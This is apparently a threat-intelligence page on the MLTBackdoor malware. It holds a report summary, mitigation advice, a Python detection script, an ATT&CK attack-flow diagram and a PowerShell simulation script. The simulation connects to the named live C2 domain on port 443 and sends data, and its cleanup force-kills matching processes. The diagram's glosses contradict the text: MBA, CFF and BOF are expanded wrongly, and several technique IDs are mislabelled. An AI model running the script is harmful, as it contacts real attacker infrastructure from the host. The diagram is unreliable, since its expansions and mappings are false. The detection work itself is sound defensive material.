Technical Analysis of MLTBackdoor
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Zscaler ThreatLabz identified a new malware family, MLTBackdoor, in May 2026. The threat is delivered through a multi-stage ClickFix infection chain and appears to be used by ransomware operators to establish initial access and support lateral movement. The malware relies on strong obfuscation, a domain-generation algorithm, and a Beacon Object File (BOF) loader to expand its capabilities after execution. Its network communications are encrypted over TLS and are designed to resemble legitimate Microsoft Delivery Optimization traffic, helping the activity blend into normal network behavior.
Investigation
The analysis followed the infection chain back to a conhost.exe wrapper that downloaded a compressed archive from a domain generated through the malware’s DGA logic. Inside that archive, endpointdlp.dll decrypted an RC4-encrypted payload that was then loaded as the MLTBackdoor binary. Researchers found that the malware uses mixed Boolean arithmetic, control-flow flattening, indirect system calls, and a custom encrypted communication protocol to hinder analysis and detection. The embedded BOF loader also allows the operators to run additional Cobalt Strike-style modules in memory.
Mitigation
Defenders should block the identified command-and-control domains and monitor for the related DGA patterns. Detection should also focus on the specific user-agent string and TLS traffic directed to /api/v1/telemetry over port 443. Security teams should watch for suspicious use of conhost.exe with the documented arguments and for creation of endpointdlp.dll in temporary directories. Behavior-based detections for API hashing and indirect system call usage can further improve visibility into MLTBackdoor activity.
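The indicators in this section expressed as detection logic over sample telemetry. This is an added example written for this page, not Zscaler ThreatLabz detection content or code from the report. It assumes Sysmon-style event dictionaries (Event ID 3 network connections, Event ID 1 process creations, Event ID 11 file creations) and a TLS-inspecting proxy log; the user-agent string and the conhost.exe arguments are placeholders because the page does not quote them, and the DGA heuristic (a long, high-entropy label mixing letters and digits) is an assumption standing in for the malware's real algorithm. It generalizes from the one DGA domain the page names (hrs2y15sungu.com) to a heuristic match on similar-looking destinations.

```python
"""Detection logic for the MLTBackdoor indicators listed in the Mitigation section.

Added example, not Zscaler ThreatLabz or any vendor's detection content.
The sample events below are constructed. Values marked PLACEHOLDER are not
on the page (the report's user-agent string and documented conhost.exe
arguments) and must be filled in from the original IOC list.
"""
import math
import re
from collections import Counter

# Indicators taken from the report text.
KNOWN_C2_DOMAINS = {"hrs2y15sungu.com"}
C2_URI_PATH = "/api/v1/telemetry"
C2_PORT = 443
DROPPED_DLL = "endpointdlp.dll"

# PLACEHOLDERS (assumptions): substitute the values from the original report.
C2_USER_AGENT = "PLACEHOLDER-MLTBackdoor-User-Agent"
CONHOST_SUSPICIOUS_ARGS = ("--headless",)   # assumed LOLBAS-style argument, not the page's

TEMP_DIR_RE = re.compile(r"\\(?:temp|tmp)\\", re.IGNORECASE)


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of `text` (0.0 for an empty string)."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def registrable_label(domain: str) -> str:
    """Second-level label of a host name ('hrs2y15sungu' for hrs2y15sungu.com)."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def looks_like_dga(domain: str) -> bool:
    """Illustrative DGA heuristic (assumption, not the malware's actual DGA):
    a long, high-entropy label that mixes letters and digits."""
    label = registrable_label(domain)
    return (len(label) >= 10
            and any(ch.isdigit() for ch in label)
            and any(ch.isalpha() for ch in label)
            and shannon_entropy(label) >= 3.0)


def detect_event(event: dict) -> list[str]:
    """Return the reasons (possibly none) an event matches MLTBackdoor tradecraft."""
    reasons = []
    src = event.get("source")
    if src == "sysmon" and event.get("EventID") == 3:          # network connection
        host = event.get("DestinationHostname", "").lower()
        if host in KNOWN_C2_DOMAINS:
            reasons.append(f"connection to known MLTBackdoor C2 domain {host}")
        elif looks_like_dga(host):
            reasons.append(f"DGA-like destination {host} (heuristic)")
    elif src == "sysmon" and event.get("EventID") == 1:        # process creation
        image = event.get("Image", "").lower()
        cmdline = event.get("CommandLine", "")
        if image.endswith("\\conhost.exe") and any(a in cmdline for a in CONHOST_SUSPICIOUS_ARGS):
            reasons.append("conhost.exe launched with suspicious arguments")
    elif src == "sysmon" and event.get("EventID") == 11:       # file create
        target = event.get("TargetFilename", "")
        if target.lower().endswith("\\" + DROPPED_DLL) and TEMP_DIR_RE.search(target):
            reasons.append(f"{DROPPED_DLL} written to a temporary directory")
    elif src == "proxy":                                        # TLS-inspecting proxy log
        if event.get("port") == C2_PORT and event.get("path") == C2_URI_PATH:
            reasons.append(f"request to {C2_URI_PATH} over {C2_PORT}")
        if event.get("user_agent") == C2_USER_AGENT:
            reasons.append("MLTBackdoor user-agent string")
    return reasons


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"source": "sysmon", "EventID": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "DestinationHostname": "hrs2y15sungu.com", "DestinationPort": 443},
    {"source": "sysmon", "EventID": 3, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "DestinationHostname": "www.microsoft.com", "DestinationPort": 443},
    {"source": "sysmon", "EventID": 3, "Image": "C:\\Windows\\System32\\conhost.exe",
     "DestinationHostname": "k9x2m7q4wz1p.net", "DestinationPort": 443},
    {"source": "sysmon", "EventID": 1, "Image": "C:\\Windows\\System32\\conhost.exe",
     "CommandLine": "conhost.exe --headless C:\\Users\\Public\\stage.exe"},
    {"source": "sysmon", "EventID": 11, "Image": "C:\\Windows\\System32\\tar.exe",
     "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Temp\\a1b2\\endpointdlp.dll"},
    {"source": "proxy", "host": "hrs2y15sungu.com", "port": 443, "path": C2_URI_PATH,
     "user_agent": C2_USER_AGENT},
]


def run_detections(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index/reasons pairs for every event that matched at least one indicator."""
    return [(i, r) for i, ev in enumerate(events) if (r := detect_event(ev))]


if __name__ == "__main__":
    for idx, reasons in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
```

Run the file directly to print the matching sample events. The entropy heuristic will miss some DGA output and will flag some legitimate CDN host names, so treat it as a hunting query to review rather than a blocking rule; the exact-match indicators (the C2 domain, the /api/v1/telemetry path on 443, endpointdlp.dll in a Temp directory) are the ones to alert on.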
Response
If MLTBackdoor activity is detected, isolate the affected endpoint immediately, terminate the malicious process, and remove any files dropped into the Temp directory by the initial loader. Investigators should then perform a forensic review for additional BOF modules or follow-on payloads. Any potentially exposed credentials should be reset, and threat hunting should be expanded to identify lateral movement attempts using the same tradecraft.
Attack Flow
graph TB
    %% Class Definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef malware fill:#ff9999
    %% Nodes
    step_a["<b>Technique</b> – <b>T1189 Drive-by Compromise</b>: Adversary hosts malicious content that is delivered when a victim visits a compromised website.<br/><b>Technique</b> – <b>T1204.001 User Execution: Malicious Link</b>: Victim clicks a crafted link that triggers execution of the payload."]
    class step_a action
    step_b["<b>Technique</b> – <b>T1659 Content Injection</b>: Malicious code is injected into legitimate web pages so that visitors receive the compromised content."]
    class step_b action
    step_c["<b>Technique</b> – <b>T1553.002 Signed Binary Proxy Execution (Defender)</b>: Use of a signed Microsoft Defender binary to proxy execution.<br/><b>Technique</b> – <b>T1574.001 Hijack Execution Flow: DLL Search Order Hijacking</b>: Loads malicious code by manipulating DLL resolution order.<br/><b>Technique</b> – <b>T1218 Signed Binary Proxy Execution</b>: Executes payload through trusted signed binaries."]
    class step_c action
    step_d["<b>Technique</b> – <b>T1027.007 Obfuscated/Stored Files: Embedded Payload</b>: Payload is obfuscated using macro binary analysis (MBA) and compressed file format (CFF) to evade detection."]
    class step_d action
    step_e["<b>Technique</b> – <b>T1497.001 Virtualization/Sandbox Evasion: System Checks</b>: Checks for virtualized environments.<br/><b>Technique</b> – <b>T1497.003 Virtualization/Sandbox Evasion: Time Checks</b>: Uses timing checks to detect analysis.<br/><b>Technique</b> – <b>T1622 Debugger Evasion</b>: Detects presence of debuggers and alters behavior."]
    class step_e action
    step_f["<b>Technique</b> – <b>T1568 Generate, Obfuscate, or Change a Domain Name</b>: Generates numerous domain names for command-and-control.<br/><b>Technique</b> – <b>T1104 Web Service (fallback C2)</b>: Uses a web service as a fallback communication channel."]
    class step_f action
    step_g["<b>Technique</b> – <b>T1090 Proxy</b>: Routes C2 traffic through a proxy.<br/><b>Technique</b> – <b>T1205 Traffic Signaling</b>: Encodes signaling information within legitimate traffic.<br/><b>Technique</b> – <b>T1001.003 Obfuscated/Encrypted Network Traffic: Protocol Impersonation</b>: Masquerades as normal TLS 443 traffic with a spoofed user-agent."]
    class step_g action
    step_h["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b>: Transfers a second-stage payload to the compromised host over the network."]
    class step_h action
    step_i["<b>Technique</b> – <b>T1546.006 Event Triggered Execution: Component Object Model Hijacking (BOF loader)</b>: Loads and executes Beacon Object Files using a Buffer-Overflow (BOF) loader."]
    class step_i malware
    %% Connections
    step_a -->|leads_to| step_b
    step_b -->|leads_to| step_c
    step_c -->|leads_to| step_d
    step_d -->|leads_to| step_e
    step_e -->|leads_to| step_f
    step_f -->|leads_to| step_g
    step_g -->|leads_to| step_h
    step_h -->|leads_to| step_i
Detections
Compression Utility Passed Uncommon Directory (via cmdline)
LOLBAS Conhost (via cmdline)
Suspicious CURL Usage (via cmdline)
IOCs (HashSha256) to detect: Technical Analysis of MLTBackdoor Part 2
IOCs (HashSha256) to detect: Technical Analysis of MLTBackdoor Part 1
Detect MLTBackdoor Network Communications [Windows Network Connection]
Execution of MLTBackdoor Infection Chain [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands:
- Recon – Resolve DGA domain – The backdoor generates a DNS query for hrs2y15sungu.com, a domain produced by its internal DGA.
- C2 Contact – Open a TCP socket – Using PowerShell, the adversary creates a raw TCP connection to the resolved IP on port 443 (HTTPS) to blend with normal traffic.
- Payload Retrieval (T1105) – Over the same socket the backdoor would pull additional modules; for the test we simply send a harmless string.
These steps emit a Sysmon Event ID 3 record with DestinationHostname = hrs2y15sungu.com, satisfying the Sigma rule’s selection condition.
Regression Test Script:
# TC-20260610-A7B3Z – Simulate MLTBackdoor C2 communication
# -------------------------------------------------------
# 1. Resolve the malicious domain (simulated DGA output)
$malDomain = "hrs2y15sungu.com"
try {
    $ip = [System.Net.Dns]::GetHostAddresses($malDomain)[0].IPAddressToString
} catch {
    Write-Error "Failed to resolve $malDomain – aborting test."
    exit 1
}

# 2. Open a TCP connection to the resolved IP on port 443
$port = 443
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect($ip, $port)

# 3. Send a harmless payload (simulating module fetch)
$stream = $client.GetStream()
$payload = [System.Text.Encoding]::ASCII.GetBytes("TEST_PAYLOAD")
$stream.Write($payload, 0, $payload.Length)

# 4. Keep connection alive briefly to guarantee log generation
Start-Sleep -Seconds 5

# 5. Clean up
$stream.Close()
$client.Close()
# ${ip}:${port} rather than $ip:$port, which PowerShell would parse as a drive-qualified variable
Write-Output "Simulation completed – connection to $malDomain (${ip}:${port}) closed."
Cleanup Commands:
# Ensure no lingering sockets remain (in case the script aborted)
# Resolve-DnsName can return several A records, so compare with -in rather than -eq
$c2Addresses = (Resolve-DnsName hrs2y15sungu.com -Type A).IPAddress
Get-NetTCPConnection -RemotePort 443 |
    Where-Object { $_.RemoteAddress -in $c2Addresses } |
    ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }